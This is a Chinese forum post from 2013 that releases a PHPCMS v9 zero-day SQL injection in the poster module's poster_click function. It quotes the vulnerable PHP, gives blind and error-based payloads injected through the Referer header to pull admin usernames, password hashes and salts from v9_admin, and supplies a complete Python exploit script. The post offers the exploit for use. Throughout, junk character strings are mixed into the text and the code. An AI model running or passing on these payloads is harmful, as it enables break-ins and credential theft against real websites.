有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:# q- y, m2 p0 a C
3 }2 t, u9 j6 W* H问题函数\phpcms\modules\poster\index.php# [* H8 y! v2 N6 u$ w
" B- V+ \6 z1 c% j4 K
public function poster_click() {; b7 Z- p9 ^. [2 W1 d# ]# f
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;; z- t. w+ y, m) Z0 X, b
$r = $this->db->get_one(array('id'=>$id));
# A1 \! ~5 x; D, Y. {. a2 sif (!is_array($r) && empty($r)) return false;
F5 h, q) y: e$ip_area = pc_base::load_sys_class('ip_area');, c% x% s2 s9 X, q4 z* t; B
$ip = ip();' u) K( l4 o; R' i2 X2 U
$area = $ip_area->get($ip);
: j, O" K6 I1 q2 I& F6 r# A. h$username = param::get_cookie('username') ? param::get_cookie('username') : '';
6 `! |1 a& ?( P# a1 Xif($id) {# ~2 P; y! ? t: D/ C9 g
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();% S+ B, S) m h6 T# [) u6 R
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
2 ?) C! S1 }6 G( W: P}2 Q+ e* j& t* J0 ~0 ?; u& p
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));0 B- T1 y' f; b& X$ Y. B( l, K+ p( f. u
$setting = string2array($r['setting']);
- R, u; Z( k# k" S" jif (count($setting)==1) { R7 ~% r- G0 W' u( S$ R# A
$url = $setting['1']['linkurl'];& @8 @) y' |0 f) Y# I9 y
} else {8 c; t. v4 J' `7 d0 ]) o! |( C4 v
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];$ d1 f: o" }& ]' Z/ B% K# S
}" I. ?/ T2 Y" U/ Q4 f
header('Location: '.$url);
7 ^; [ L1 Z# z2 c: `5 G5 K' K+ ]}
8 F7 u: |2 |" a, \" l5 H
# Q# q4 A6 {9 m' b
# {3 K' R4 j9 I/ H1 K1 m: k% W1 w; `9 D( e" e" a
利用方式:/ a* V$ I# s [) M# X; T$ Y6 S
. o! G. L1 z1 ^1 `# B
1、可以采用盲注入的手法:
5 e1 ]3 ~; q; s( M; o: Z; ?- c1 A6 F0 V2 M! {2 R3 l) G. J
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
. |7 D. \7 l' }7 }6 T* L' U, G9 t
& y0 v& g7 A P. O. g( H" p6 D" U5 a通过返回页面,正常与否一个个猜解密码字段。2 m0 V' n, n* E& {
0 ]# z1 M% I7 o( X* Y9 x- j3 c- X2、代码是花开写的,随手附上了:
) l( o, D0 A5 A. J9 u g N5 j3 l
* w6 B- I4 R2 d+ T ^1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
/ H$ I% k& V" g* ^. `" J# r, f) _! X" R
此方法是爆错注入手法,原理自查。
0 N9 n! d; v) ^, K8 K4 ^; k( v3 o; s% k% f0 v
6 b i3 x% Z- p% t+ C [* j3 g7 F& e5 a1 n0 p) s
利用程序:
+ d" b4 B7 \( e/ {- ^8 j @
. s% R0 V8 S) G% H* r" v9 R#!/usr/bin/env python1 O4 I. C5 R U/ t+ a4 b
import httplib,sys,re3 V4 x8 g2 {! M
% T' z5 q# l8 J$ M1 p" d% Vdef attack():
" q. c8 h3 R: k3 S9 P aprint “Code by Pax.Mac Team conqu3r!”
& J0 p6 _8 a3 `; Cprint “Welcome to our zone!!!”
6 B( c) q4 o3 ^; G7 b* l0 C: Murl=sys.argv[1]8 z2 p" Q0 \; p; B
paths=sys.argv[2]
+ W2 O2 c; g+ }& D7 z, y& e* [# Hconn = httplib.HTTPConnection(url)3 K& T2 u9 I2 Q' B r
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,8 C# |/ _& ^* j% p$ r# k- ?
“Accept”: “text/plain”,- B& Z7 A) Q# |* v7 m3 [% N
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
/ |2 h3 y5 W3 |conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers). d0 n0 B- p+ M2 W1 `& @0 s9 |
r1 = conn.getresponse()
2 d b/ u/ u: V% Jdatas=r1.read()+ W# O" G; I+ M' B/ S ^
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
" x: e, V" |- Hprint datas[0]
. q, Z/ a% _4 T* w. tconn.close()/ D" \( g+ b4 Z. b2 r. Z
if __name__==”__main__”:
, u/ Y8 z) G6 ?5 k4 e% [: cif len(sys.argv)<3:( u, _9 `3 @6 G5 Z" {6 i2 ?
print “Code by Pax.Mac Team conqu3r”# B' H) Q. Y4 D" f2 M# q
print “Usgae:”0 ]7 B$ K. m: }: O2 [
print “ phpcmsattack.py www.paxmac.org /”
/ d2 r' X3 S7 o2 j! @& cprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
/ E6 k& G; X( ?& Usys.exit(1)0 e( J* n+ G& S
attack(). d# [4 e( J) E4 C
$ V3 D( b* _! y, _9 g2 {8 D
|
发表于 2013-1-11 21:01:00
收藏
支持
反对